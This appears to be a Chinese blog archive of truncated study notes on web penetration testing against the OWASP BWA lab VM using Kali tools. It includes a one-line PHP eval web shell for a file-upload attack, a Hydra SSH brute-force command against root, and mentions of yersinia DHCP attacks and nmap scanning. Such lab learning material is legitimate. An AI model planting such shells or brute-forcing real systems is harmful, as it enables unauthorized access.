参考:https://blog.csdn.net/tangxl2008008/article/details/71411547
选择tomcat
然后就可以开启提示了
2020-05-04
实验内容
2020-05-04
idea开发javaweb
参考https://blog.csdn.net/a145127/article/details/84893355
2020-05-04
文件上传漏洞
我们很多攻击都会集中在下面这个应用里面
我们利用文件上传漏洞来上传程序文件
无论你上传什么文件都可以
我们上传一段sheel脚本
<?php @eval($_POST['caidao']);?>
caidao是密码
然后下载
2020-05-02
环境准备
我们先下载靶机下载地址:https://sourceforge.net/projects/owaspbwa/
自己直接直接用vmware启动就可以了。。
上面这个就是靶机提供的各种应用了
kali自己安装。。
2020-05-02
2019千锋Linux视频教程-Web安全渗透(40集)高级
原视频地址:https://www.youtube.com/watch?v=ZaGUYarouas&list=PLwDQt7s1o9J6vKkkYfcCqBCs0d4gZ3yWB
2020-05-02
漏洞扫描
2020-05-02
phpmyadmin爆破
https://lddp.github.io/2019/09/15/phpMyAdmin%E7%88%86%E7%A0%B4%E7%A5%9E%E5%99%A8/
软件长下面这个样子:
2020-05-02
ssh爆破
我们用Hydra来实现命令如下:hydra -l(用户名) root -P(爆破字典) /usr/share/wordlists/passwords.txt(绝对路径,passwords.txt为字典文件名,可以将自己的字典加入到该目录下)
2020-05-02
ddos攻击
ddos攻击可以参考这个:https://www.zhihu.com/question/22259175
启动方法: yersinia -G
软件长下面这个样子
正常电脑启动会访问DHCP服务器获取ip地址(这个只能攻击路由器)
下一
2020-05-02
端口扫描
使用大名鼎鼎的nmap即可实现参考教程:https://wizardforcel.gitbooks.io/kali-linux-cookbook/content/ch4.html
最简单的使用方法:nmap 192.168.56.101
扫
2020-05-02
解锁root
输入:sudo passwd root然后就可以直接输入密码了
然后使用 su root 即可切换到root用户
2020-05-02